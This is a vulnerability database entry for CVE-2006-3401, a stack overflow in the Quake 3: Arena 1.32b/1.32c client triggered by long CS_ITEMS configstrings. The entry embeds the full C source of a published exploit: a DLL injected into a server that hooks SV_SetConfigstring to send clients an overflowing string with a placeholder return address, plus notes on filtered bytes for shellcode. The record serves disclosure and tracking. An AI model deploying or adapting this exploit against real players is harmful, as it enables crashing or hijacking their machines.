ID OSVDB:34447
Type osvdb
Reporter OSVDB
Modified 2006-07-02T20:33:38
Description
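No description provided by the source (OSVDB). Per the CVE-2006-3401 record referenced below: stack-based buffer overflow in the Quake 3 Engine as used by Quake 3: Arena 1.32b and 1.32c, allowing remote attackers to cause a denial of service and possibly execute code via long CS_ITEMS values. The referenced exploit record (EDB-ID:1977) labels this a client-side overflow delivered by a modified server, so the exposed party is a client connecting to an untrusted server.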
References:
Secunia Advisory ID:20946
Secunia Advisory ID:20961
ISS X-Force ID: 27616
Generic Exploit URL: http://milw0rm.com/exploits/1977
FrSIRT Advisory: ADV-2006-2684
FrSIRT Advisory: ADV-2006-2657
CVE-2006-3401
Bugtraq ID: 18777
{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:20946](https://secuniaresearch.flexerasoftware.com/advisories/20946/)\n[Secunia Advisory ID:20961](https://secuniaresearch.flexerasoftware.com/advisories/20961/)\nISS X-Force ID: 27616\nGeneric Exploit URL: http://milw0rm.com/exploits/1977\nFrSIRT Advisory: ADV-2006-2684\nFrSIRT Advisory: ADV-2006-2657\n[CVE-2006-3401](https://vulners.com/cve/CVE-2006-3401)\nBugtraq ID: 18777\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "72534b1cad6ce40f90e57c6f904c5e08"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "3edc8dfd5f588688034af7bef614c3f5"}, {"key": "href", "hash": "3fdf3b3e4f786f9a58d720a9e70331e6"}, {"key": "modified", "hash": "405549030a3d8395a2d7ce90d4041140"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "405549030a3d8395a2d7ce90d4041140"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "612bdb8742e7f140acda563137a5ef29"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34447", "modified": "2006-07-02T20:33:38", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-04-28T13:20:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3401"]}, {"type": "exploitdb", "idList": ["EDB-ID:1977"]}], "modified": "2017-04-28T13:20:30"}, "vulnersScore": 7.4}, "id": "OSVDB:34447", "title": "Quake 3 Engine CS_ITEMS Remote Overflow", "hash": "92705f79549ffaef3e4ef200b006d20b0b0ea72ad41034902debf8c4fbb74cbd", 
"edition": 1, "published": "2006-07-02T20:33:38", "type": "osvdb", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-3401"], "lastseen": "2017-04-28T13:20:30"}
{"cve": [{"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Quake 3 Engine as used by Quake 3: Arena 1.32b and 1.32c allows remote attackers to cause a denial of service and possibly execute code via long CS_ITEMS values.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-3401", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3401", "published": "2006-07-06T20:05:00", "title": "CVE-2006-3401", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T15:16:10", "bulletinFamily": "exploit", "description": "Quake 3 Engine Client CS_ITEMS Remote Overflow Exploit (Win32). CVE-2006-3325,CVE-2006-3401. Dos exploit for windows platform", "modified": "2006-07-02T00:00:00", "published": "2006-07-02T00:00:00", "id": "EDB-ID:1977", "href": "https://www.exploit-db.com/exploits/1977/", "type": "exploitdb", "title": "Quake 3 Engine Client CS_ITEms Remote Overflow Exploit Win32", "sourceData": "/*\nQuake 3 Engine Client CS_ITEMS Remote Stack Overflow Exploit (Win32)\nWritten by RunningBon\n\nE-Mail: runningbon@gmail.com\nIRC: irc.rizon.net #kik\n\nThis is a DLL, which gets injected into the server exe.\n\nYou will need Microsoft Detours library to compile this exploit (http://research.microsoft.com/sn/detours/)\nI recommend you compile this with Microsoft Visual C++\n\nUse this responsibly. 
You are responsible for any damage you cause using this.\n\nInfo:\nThe engine strips bytes >127, '%', and '\\0' before it overflows, so you will need encoded shellcode and an EIP which doesn't contain any of these characters.\n*/\n\n#include <stdio.h>\n#include <windows.h>\n#include <detours.h>\n\nstruct VersionStruct {\n\tchar *pVersionString;\n\tDWORD dwVersionStringAddr;\n\tDWORD dwSetConfigstringAddr;\n\tDWORD dwFillSize;\n\tDWORD dwNewEIP;\n\tint iCS_ITEM;\n};\n\nVersionStruct Versions[] = {\n\t{ \"Quake 3: Arena\", 0x4C1B94, 0x431E70, 836, 0x13333337, 27 },\t//Quake 3 Arena 1.32c\n\t{ \"Quake 3: Arena\", 0x4D2184, 0x438610, 836, 0x13333337, 27 },\t//Quake 3 Arena 1.32b\n};\n\nVersionStruct *pVersion = NULL;\n\nvoid (*orig_SV_SetConfigstring)(int iIndex, const char *pVal);\nvoid SV_SetConfigstring_Hook(int iIndex, const char *pVal)\n{\n\tchar szString[4096];\n\tchar *pPtr = NULL;\n\n\tif(pVersion != NULL)\n\t{\n\t\tif(iIndex == pVersion->iCS_ITEM)\n\t\t{\n\t\t\tmemset(szString, 0, sizeof(szString));\n\t\t\tpPtr = &szString[0];\n\n\t\t\tmemset(pPtr, 'a', pVersion->dwFillSize);\n\t\t\tpPtr += pVersion->dwFillSize;\n\n\t\t\tmemcpy(pPtr, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));\n\t\t\tpPtr += sizeof(DWORD);\n\n\t\t\torig_SV_SetConfigstring(iIndex, szString);\n\n\t\t\treturn;\n\t\t}\n\t}\n\n\torig_SV_SetConfigstring(iIndex, pVal);\n}\n\nbool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)\n{\n\tif(dwReason == DLL_PROCESS_ATTACH)\n\t{\n\t\tfor(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)\n\t\t{\n\t\t\tif(!stricmp((char*)Versions[i].dwVersionStringAddr, Versions[i].pVersionString))\n\t\t\t{\n\t\t\t\tpVersion = &Versions[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tif(pVersion == NULL)\n\t\t{\n\t\t\t//Could not find correct version\n\t\t\treturn 1;\n\t\t}\n\n\t\tDetourFunction((BYTE*)pVersion->dwSetConfigstringAddr, (BYTE*)SV_SetConfigstring_Hook);\n\t\t_asm mov [orig_SV_SetConfigstring], eax\n\t}\n\n\treturn 1;\n}\n\n// milw0rm.com 
[2006-07-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1977/"}]}